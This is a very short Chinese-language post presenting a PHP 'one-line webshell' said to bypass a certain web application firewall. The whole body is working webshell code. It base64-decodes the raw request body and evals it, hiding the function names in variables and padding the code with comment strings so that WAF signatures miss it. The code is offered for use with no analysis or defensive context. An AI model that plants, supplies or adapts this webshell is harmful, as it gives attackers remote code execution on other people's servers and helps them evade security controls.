Bypass某WAF的一句话木马:

1
2
3
4
5
6
<?php
$c="base64_decode";
$b="file_get_contents";
$p=/*-/*-*/$b("php://input")/*-/*-*//*-/*-*//*-/*-*/;
eval(/*-/*-*/$c($p).";"/*-/*-*//*-/*-*//*-/*-*/);
?>